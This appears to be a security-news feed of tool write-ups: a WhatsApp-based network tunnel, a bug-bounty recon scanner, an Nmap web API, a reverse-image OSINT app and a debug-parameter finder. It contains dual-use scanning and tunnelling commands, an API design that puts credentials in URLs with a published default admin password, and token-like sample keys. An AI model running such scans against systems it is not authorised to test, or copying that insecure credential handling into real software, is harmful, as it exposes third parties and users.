Clone the repository on your server and install node dependencies.

  1. cd path/to/wa-tunnel
  2. npm install

Then you can start the server with the following command, where port is the proxy port and host is the proxy host you want to forward, and number is the client's WhatsApp number with the country code, all together and without the +.

npm run server host port number

You can use a local proxy server like follows:

npm run server localhost 3128 12345678901

Or you can use a normal proxy server like follows:

npm run server 192.168.0.1 3128 12345678901

Client Side

Clone the repository on your server and install node dependencies.

  1. cd path/to/wa-tunnel
  2. npm install

Then you can start the client with the following command, where port is the local port where you will connect, and number is the server's WhatsApp number with the country code, all together and without the +.

npm run client port number

For example

npm run client 8080 1234567890

Usage

The first time you run the script, Baileys will ask you to scan the QR code with the WhatsApp app; after that, the session is saved for later use.

It may crash; that's normal. Just restart the script and you will have your client/server ready!

Once you have both client and server ready you can test using curl and see the magic happen.

curl -v -x proxyHost:proxyPort https://httpbin.org/ip

With the example commands above, that would be:

curl -v -x localhost:8080 https://httpbin.org/ip

It has also been tested with a normal browser like Firefox; it's slow, but usable.

You can also forward other protocol ports like SSH by setting up the server like this:

npm run server localhost 22 12345678901

And then connect to the server by using in the client:

ssh root@localhost -p 8080

Usage on Android

To use on Android, you can use it with Termux using the following commands:

pkg update && pkg upgrade
pkg install git nodejs -y
git clone https://github.com/aleixrodriala/wa-tunnel.git
cd wa-tunnel
npm install

Disclaimer

Using this library may get your WhatsApp account banned, use with a temporary number or at your own risk.

TO-DO

  • Make an Android script to install node dependencies on termux
  • When Baileys supports calls, implement package sending through calls
  • Implement sending files for big data packages to reduce messages and maybe improve speed
  • Cache socket responses to reduce even further the amount of messages sent
  • Documentation

License

MIT



American Fuzzy Lop plus plus 4.06c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works • Installation • Usage • MODES • For Developers • Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run Nuclei and other scans on the previous output. So basically, this is an automation script for your initial recon in bug bounty.

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements -

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Features of EXPLOIT mode : subdomain enumeration, URL Enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains the following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains the following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool; in other words, it automates subdomain enumeration across different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains the following functions

  • Same features as SUBDOMAIN ENUMERATION MODE, but it also identifies HTTP or HTTPS services

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder

Updating the tool to the latest version: you can run the following command to update the tool

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is an implementation of our college PCL project, which is still under development and constantly updated.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter Type Description
username string Required. username of the current user
password string Required. current user password
target string Required. The target Hostname and IP

Get item

  GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln
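
Putting the reference above together, running a scan is a single authenticated GET per profile. A quick client sketch (the base URL and credentials are placeholders for your own deployment):

# scan.py - minimal client sketch for the API above
# (base URL and credentials are placeholders for your own deployment)
import requests

BASE = "http://127.0.0.1:5000"   # assumed; wherever the Flask app is deployed
USER, PASSWD = "admin", "password"
TARGET = "scanme.nmap.org"

# p1 = "Effective Scan" (-Pn -sV -T4 -O -F), per the table above
r = requests.get(f"{BASE}/api/p1/{USER}:{PASSWD}/{TARGET}", timeout=600)
r.raise_for_status()
print(r.json())  # per the table above, each profile returns its results as JSON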

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter Type Description
admin-username String Admin username
admin-passwd String Admin password
id String Id for newly added user
username String Username of the newly added user
passwd String Password of the newly added user
t-username String Target username
t-user-id String Target userID
t-userpass String Target users password
new-t-username String New username for the target
new-t-user-id String New userID for the target
new-t-userpass String New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,



GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily


GVision is a reverse image search app that uses the Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.


About Google Cloud Vision API

Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.
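
For context, here is roughly what landmark and web-entity detection look like with the official google-cloud-vision Python client. This is a sketch of the underlying calls, not GVision's own code; gvision.py wraps them behind the Streamlit UI.

# vision_sketch.py - landmark + web detection with google-cloud-vision
# (a sketch of the underlying API calls; gvision.py adds the Streamlit UI)
from google.cloud import vision  # pip install google-cloud-vision

# assumes GOOGLE_APPLICATION_CREDENTIALS points at your service-account JSON
client = vision.ImageAnnotatorClient()
image = vision.Image(content=open("photo.jpg", "rb").read())

for landmark in client.landmark_detection(image=image).landmark_annotations:
    loc = landmark.locations[0].lat_lng
    print(f"Landmark: {landmark.description} ({loc.latitude}, {loc.longitude})")

for entity in client.web_detection(image=image).web_detection.web_entities:
    print(f"Web entity: {entity.description} (score {entity.score:.2f})")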

Getting Started

Before using the app, you need to obtain a Google Cloud Vision API key.

  • Go to the Google Cloud Platform Console.
  • Create a new project or select an existing one.
  • Enable the Cloud Vision API for your project.
  • Create a service account and download a private key in JSON format.
  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.

Installation

To install the dependencies, simply run the following command:

pip install -r requirements.txt

Running the app

You can run the app locally by running the following command:

streamlit run gvision.py

Usage

Using GVision is simple and straightforward:

  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.
  • Once the key is uploaded, the app will automatically authenticate with the Google Cloud Vision API.
  • Upload an image in JPG, JPEG, or PNG format by clicking on the Choose an image button.
  • Wait for the app to analyze the image. The app will detect landmarks and web entities present in the image and display them on a map.
  • Choose between the different tile options to view the detected landmarks and web entities.

You can also find links to the Google Cloud Vision API documentation and pricing in the Resources section of the sidebar.

To reset the app to its default state or to clear the uploaded image and results, click on the Reset app button.

Resources

Mentions



I2P 2.2.1

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

Suricata IDPE 6.0.11

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

debugHunter - Discover Hidden Debugging Parameters And Uncover Web Application Secrets


Discover hidden debugging parameters and uncover web application secrets with debugHunter. This Chrome extension scans websites for debugging parameters and notifies you when it finds a URL with modified responses. The extension utilizes a binary search algorithm to efficiently determine the parameter responsible for the change in the response.
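
The binary search is the clever part: rather than testing candidate parameters one at a time, the list is halved repeatedly until the single response-changing parameter is isolated, taking O(log n) requests instead of O(n). A hedged sketch of the idea (the candidate list and comparison are simplified; the extension's real logic lives in its source):

# binsearch_params.py - sketch of debugHunter's binary-search idea
# (candidate list and comparison are simplified; the extension's own
#  logic lives in its source)
import requests

CANDIDATES = ["debug", "test", "admin", "trace", "verbose", "dev", "staging", "beta"]

def response_body(url, params):
    qs = "&".join(f"{p}=1" for p in params)
    sep = "&" if "?" in url else "?"
    return requests.get(url + (sep + qs if qs else ""), timeout=10).text

def find_culprit(url, params, baseline):
    """Halve the candidate set until one response-changing parameter remains."""
    if response_body(url, params) == baseline:
        return None  # nothing in this set changes the response
    while len(params) > 1:
        half = params[: len(params) // 2]
        if response_body(url, half) != baseline:
            params = half                        # culprit is in the first half
        else:
            params = params[len(params) // 2 :]  # otherwise it's in the second
    return params[0]

url = "https://example.com/"
print(find_culprit(url, CANDIDATES, baseline=response_body(url, [])))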


Features

  • Perform a binary search on a list of predefined query parameters.
  • Compare responses with and without query parameters to identify changes.
  • Track and display the number of modified URLs in the browser action badge.
  • Allow the user to view and clear the list of modified URLs.

Installation

Option 1: Clone the repository

  1. Download or clone this repository to your local machine.
  2. Open Google Chrome, and go to chrome://extensions/.
  3. Enable "Developer mode" in the top right corner if it's not already enabled.
  4. Click the "Load unpacked" button on the top left corner.
  5. Navigate to the directory where you downloaded or cloned the repository, and select the folder.
  6. The debugHunter extension should now be installed and ready to use.

Option 2: Download the release (.zip)

  1. Download the latest release .zip file from the "Releases" section of this repository.
  2. Extract the contents of the .zip file to a folder on your local machine.
  3. Open Google Chrome, and go to chrome://extensions/.
  4. Enable "Developer mode" in the top right corner if it's not already enabled.
  5. Click the "Load unpacked" button on the top left corner.
  6. Navigate to the directory where you extracted the .zip file, and select the folder.
  7. The debugHunter extension should now be installed and ready to use.

Usage

It is recommended to pin the extension to the toolbar so you can see when a new URL modified by a debug parameter is found.

  1. Navigate to any website.
  2. Click on the debugHunter extension icon in the Chrome toolbar.
  3. If the extension detects any URLs with modified responses due to debugging parameters, they will be listed in the popup.
  4. Click on any URL in the list to open it in a new tab.
  5. To clear the list, click on the trash can icon in the top right corner of the popup.

Contributing

We welcome contributions! Please feel free to submit pull requests or open issues to improve debugHunter.



Wireshark Analyzer 4.0.5

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.
โŒ